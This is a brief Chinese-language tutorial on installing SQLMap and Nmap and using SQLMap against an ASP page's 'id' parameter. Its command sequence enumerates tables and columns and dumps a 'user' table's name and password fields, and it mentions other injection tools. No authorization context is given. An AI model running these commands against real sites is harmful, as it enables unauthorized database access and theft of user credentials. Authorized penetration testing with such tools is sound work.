SQLMap是一个功能很强大的渗透测试工具,而且源码开放,支持的数据库:MySQL、Oracle、PostgreSQL、Microsoft SQL Server、Microsoft Access、SQLite等等。
第一步、安装 Python 环境:yum install python -y
第二步、SQLMap 的安装比较简单,把源码下载下来就可以了,安装到指定目录为/usr/local/ ,下载命令:
git clone https://github.com/sqlmapproject/sqlmap.git
第三步、安装 Nmap ,下载编译安装
git clone https://github.com/nmap/nmap.git cd nmap ./configure make && make install make clean
简单演示一下关于sqlmap下注入:
注入漏洞地址:http://www.example.com/showannounce.asp?id=104
./sqlmap.py -u "http://www.example.com/showannounce.asp?id=104" 【Kali下使用:sqlmap -u "http://jgkd.xxx.com/announceshow.asp?id=203"】
./sqlmap.py -u "http://www.example.com/showannounce.asp?id=104" --tables
./sqlmap.py -u "http://www.example.com/showannounce.asp?id=104" --columns -T user
./sqlmap.py -u "http://www.example.com/showannounce.asp?id=104" --dump -T user -C "name,psw"
中间会提示让你输入线程,输入大概5到10个线程这个样子。上面的user,psw这些视情况而定,灵活应用。
还有如果不熟悉Kali或没有Linux环境的,用啊D,明小子、穿山甲等工具去跑也可以,前提是你字典足够强大!
